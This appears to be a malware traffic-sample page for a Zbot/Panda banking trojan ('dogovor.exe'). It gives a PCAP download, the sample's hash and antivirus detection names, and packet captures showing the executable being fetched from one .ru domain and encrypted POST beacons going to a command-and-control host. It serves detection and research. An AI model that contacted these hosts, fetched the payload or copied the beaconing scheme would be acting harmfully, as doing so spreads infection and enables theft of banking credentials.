dogovor.exe POST /web Panda Zbot Banking Malware Trojan PCAP file download Traffic Sample

Download Attachments

  • 1 pcap dog
    Date added: October 27, 2016 1:05 am Added by: admin File size: 19 KB Downloads: 96
SHA256: 74f98f92d0536a98c39bd7110f47d3ef4f61b916915386484b8da175fe35110d
File name: dogovor.exe
Detection ratio: 18 / 55
Analysis date: 2016-10-27 00:53:00 UTC ( 0 minutes ago )
Ad-Aware Trojan.GenericKD.3636701 20161027
AegisLab Uds.Dangerousobject.Multi!c 20161026
Arcabit Trojan.Generic.D377DDD 20161026
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9945 20161026
BitDefender Trojan.GenericKD.3636701 20161027
Bkav W32.eHeur.Malware11 20161026
CrowdStrike Falcon (ML) malicious_confidence_69% (W) 20160725
DrWeb Trojan.PWS.Panda.10151 20161027
ESET-NOD32 a variant of Win32/Kryptik.FIOO 20161027
Emsisoft Trojan.GenericKD.3636701 (B) 20161027
F-Secure Trojan.GenericKD.3636701 20161027
GData Trojan.GenericKD.3636701 20161027
Invincea generic.a 20161018
Kaspersky Trojan-Spy.Win32.Zbot.xipi 20161027
McAfee Artemis!0860360612D8 20161027
McAfee-GW-Edition BehavesLike.Win32.BadFile.gc 20161027
eScan Trojan.GenericKD.3636701 20161027
Symantec

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AUBF/detailed-analysis.aspx

 

 

2016-10-26 20:51:36.511174 IP 192.168.1.102.50052 > 155.94.239.146.80: Flags [P.], seq 0:311, ack 1, win 256, length 311: HTTP: GET /buhgalter/dogovor.exe HTTP/1.1
E.._..@…,….f.^…..P+..0p…P….U..GET /buhgalter/dogovor.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: popularorderweddingstyle.ru
Connection: Keep-Alive

2016-10-26 20:51:36.680521 IP 192.168.1.102.54678 > 75.75.76.76.53: 65257+ A? popularorderweddingstyle.ru. (45)
E..I…….O…fKKLL…5.5,…………..popularorderweddingstyle.ru…..

NG .H/P….C……..
2016-10-26 20:52:19.015872 IP 192.168.1.102.50055 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
E..%{{@…~….f._%H…P}
NG .H/P…….POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

(….f.ELC…,c=…”..lG<aC..:<+.x*^..te.)..t…………..e.l……C’.v|..@.`|.m       .._………\..WN.a!..9..k.q..t#S.@.*v.v.b..V.L..iq….yV…….4.._..!kQX.DY….”.
(…Bwmi…BgV…,..
…..J….O…..HNU..’..[..5}/o……7.%..ri”…2.zF……..z.,:2.X…z..zHz..1..Z.\…J………+…

E..({.@……..f._%H…P…..;.KP….p……..
2016-10-26 20:52:24.710515 IP 192.168.1.102.50056 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
E..%{.@…~….f._%H…P…..;.KP….4..POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

…..P^R…….,…LhR….n.S..^.P.3…..dPd*..~.q_…………a..7.=…a.$../.a.k.K.V3.;MU.&…/..,….-LM.64.`..[.[   .H..
.]…..a….;..z…W<.g02’…   ….#.cY….%.l..[v..W..3…V..’.W……O.Lm.lx…`……..{..H.[vW..@…..3..|…K.<..H….@….O?mG..)…=..).Y.n..}g>.W..#..u…z…
2016-10-26 20:52:25.149391 IP 192.168.1.102.50056 > 23.95.37.72.80: Flags [.], ack 234, win 255, length 0

E..({.@……..f._%H…P…..D..P….I……..
2016-10-26 20:52:30.362084 IP 192.168.1.102.50057 > 23.95.37.72.80: Flags [P.], seq 0:509, ack 1, win 256, length 509: HTTP: POST /web/ HTTP/1.1
E..%{.@…~….f._%H…P…..D..P…YS..POST /web/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: antonovaeroconceptflypower.ru
Content-Length: 288
Connection: Keep-Alive
Cache-Control: no-cache

…h-1….~…  …E(.J. ….=uN[…..f.#”…..?B0DJ.J.#lC……..#H.x#………..4..Fq..s6.bD..i..l.|….Y.x;[.G……w…<<…Ej….g.p.D…|..Y.4J…b.U.’…a…>…..!..E..m.

Leave a Reply